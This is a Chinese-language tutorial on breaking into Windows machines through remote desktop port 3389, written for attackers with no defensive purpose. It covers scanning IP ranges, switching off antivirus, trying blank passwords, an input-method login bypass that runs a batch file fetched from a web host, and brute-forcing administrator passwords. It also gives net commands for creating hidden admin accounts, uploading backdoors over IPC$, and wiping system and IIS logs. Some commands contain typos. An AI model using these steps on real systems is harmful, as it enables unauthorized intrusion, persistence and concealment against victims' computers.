服务器：3389端口入侵教程！

3389端口是Win7系统远程终端服务以及WindowsXP系统远程桌面服务默认所使用的端口，原本是为了管理人员能够方便的远程维护管理计算机而设计的，但如今已经成为了黑客们最喜爱的一种人侵途径，入侵者通过3389端口登录进入远程系统后，就可以象操作本地电脑那样来任意的控制它，把远程电脑变成他的3389肉鸡了！

针对3389端口的入侵，我的思路就是先使用扫描工具扫描一段IP，扫描到那些开启了3389端口的主机后（当然有存在漏洞的主机会更好），就使用输入法漏洞来登录远程系统，或是使用破解密码的方法来得到远程系统的登录帐号和密码，最后就是在肉机上偷偷的建立一个管理员权限的帐户，再删除肉机上的系统日志文件，清除自己的入侵痕迹。

一、扫描到入侵目标

使用X-Scan、Superscan、流光等工具都可以扫描到开启了3389端口的主机，X-Scan是国内一款非常著名的安全检测/漏洞扫描软件，可以扫描到远程主机都开放了哪些端口以及系统中存在的弱口令，还能扫描出远程主机存在的特定系统漏洞等信息，下面我就以X-Scan为例来进行介绍，使用其它的扫描工具方法也都是大同小异的。

在使用X-S can前，我们最好先关闭杀毒软件的监视和主动防御功能，因为一些杀毒软件会自动清除X-Scan的插件，导致X-Scan无法扫描出存在安全问题的主机。比如我们关闭KV的这些功能，方法就是右键点击系统托盘区的KV图标，在右键菜单中勾选“关闭所有监视”，不勾选“主动防御”。

打开X-Scan的压缩包，直接双击目录下的xscan_gui.exe就会启动X-Scan了，点击X-Scan主界面中最上方工具栏中的“扫描参数”按钮，在“检测范围”的“指定IP范围”中输入想要扫措的IP或IP段:比如“218.22.1.134-218.22.2.255”，注意这个扫描的范围不要设置的太大，否则扫描会很漫长的。点击左侧“全局设置”中的“其他设置”，勾选上“跳过没有响应的主机”以及“跳过没有检测到开放端口的主机”，这样可以提高扫描的速度。

点击左侧“插件设置”下的“端口相关设置”，在右边的“待检测端口”中输入想要扫描的端口号，X-Scan默认就会扫描3389等常见端口，“检测方式”下有TCP和SYN可供我们选择，如果我们使用的是Win7系统，那么可以选择SYN方式，而如果是WindowsXP系统，那么只能选择TCP方式，如果仍想使用SYN方式的话，需要打上补丁才行。

二、如何登录远程桌面

扫描到开启了3389端口的主机后，使用XP系统的用户可以使用“远程桌面连接”，而使用其它系统的用户则可以使用3389登录器来登录远程桌面。比如我们在XP系统中点击“开始”——“程序”——“附件”——“通讯”——“远程桌面连接”，在弹出的远程桌面连接窗口中，“计算机”一栏中就输入想要远程登录的计算机名称或IP地址，点击“连接”后就会出现远程计算机的登录界面，我们只有输入正确的用户名和密码后才能登录进入远程桌面。但通常我们是不知道这个登录用户名和密码的，这时可以使用administrator、new或guest作为用户名，密码为空来尝试登录，如果还无法登录,就可以尝试使用下面耍介绍的输入法漏洞以及暴力破解这两种方法来解决了。

1、输入法漏洞

如果远程主机存在输入法漏洞，那我们就可以绕过系统的身份验证，既使没有帐号和密码也能够登录进入，具体的方法如下，打开记事本，输入以下的命令：net user guest /active:yes net user guest ahla net local group administrarors guest/add第一行命令就是激活系统中的Guest帐户，第二行命令是将Guset帐户的密码设置为ahla，第三行命令是将Guest帐户添加到系统管理员组_中。在记事本中点击“文件”“另存为”，我把文件保存为了srfbat，再把这个srf.bat文件上传到163等免费个人主页空间中。打开远程桌面连接，在远程计算机的登录界面中按下Ctrl+shift键调出全拼输入法，右键点击“全拼”左边的微软标志，弹出了全拼输入法的快捷菜单，我们选择“帮助”——“操作指南”，就打开了“输入法操作指南”窗口。

在该窗口的基本操作目录下任意选择一项帮助目录，然后点击鼠标右键，在弹出的快捷菜单中选择“跳至URL”，然后在“跳至该URL”栏中输入“d:\”，点击“确定”会就会列出d盘中的文件夹了，当然我们在这里可以输入，然后点击“确定”，在“文件下载”对话框中选择“在当前位置运行该程序”，点击“确定”按钮后就会运行srfbat中的命令了，最后我们关闭输入法帮助文件窗口，使用用户名guest、密码ahla就可以登录进入远程桌面了，此时Guest就为系统管理员帐户，抓肉机大功告成！

2、暴力破解

如果知道了远程系统的登录用户名（比如Administrator），就可以使用知音3389暴破工具来暴力破解其密码，然后就可以使用该帐户和破解出的密码来登录远程计算机的3389了，具体的方法如下，我们首先使用密码字典软件（比如易忧超级字典生成器、真空密码字典生成器等）生成一个密码字典文件( aaa.txt)，然后下载解压知音3389暴破工具并双击运行，在软件主界面的“目标1P”中输人我们扫描到的开放了3389端口的IP地址，“用户”栏中就输入Administrator（Windows系统的默认管理员帐户），点击“打开”按钮，在弹出的对话框中选择一个密码字典aaa.txt，其它的设置保持默认的就可以，点击“开始(Scan)”后，程序就会自动使用各种密码来尝试登录远程计算机的3389，还会弹出一个破解进程窗口，显示了每个密码尝试登录的结果，failed表示该密码无法登录，如果看到Succes，就表明该密码是正确的密码，破解成功了。

三、在肉机上留后门

登录进入远程计算机的桌面后，我们就可以像在本地操作自己的电脑那样来操作远程计算机了，点击“开始”——“程序”——“附件”——“命令提示符”，先使用“netuser”命令查看一下对方系统管理组中都有哪些用户名，然后我们就可以留后门了，方便以后的进入。

1、建立一个帐户或激活Guest

使用“net user用户名密码/add”来建立一个与已有用户名相似的帐户用来迷惑管理员，或者是执行下面的命令来激活并升级Guest帐户：net user guest /active:yes net user guest ahla net localgroup administrarors guest/add

2、使用IPC管道连接肉机

我们在本机的命令提示符下可以直接使用“net use\肉机IP\ipcS "ahla" /user:”"guest"”来连接远程计算机。

3、上传后门程序

连接后，再使用下面的命令把后门程序或配置好的术马上传到肉机的C盘或其他的目录下：“copy 后门程序、\肉机IP \c$”。

四，删除肉机上日志

如果我们不想让对方掌握自己的入侵证据，那就删除肉机上系统日志吧，在本机的命令提示符下依次执行下面的命令：

net use\\肉鸡IP\ipc$ "ahla"/user:"guest"

copy CleanIISLog.exe\\肉鸡IP\c$

net use\\肉鸡IP\ipc$ "ahla"/user:"guest"

cleaniislog.exe -s \\我的IP -1 "application" -C

cleaniislog.exe -s \\我的IP -1 "system" -C

cleaniislog.exe -s \\我的IP -1 "security" -C

net stop w3svc

del c:\winnt\system32\logfiles\*.*/s/f/q

del d:\winnt\system32\logfiles\*.*/s/f/q

net START W3SVC

net use \\肉鸡IP\ipcS/delete

最后，在提醒一下大家，本文中用到的一些软件，杀毒软件会查杀的，因此我们在解压或执行程序前，最好是先关闭杀毒软件。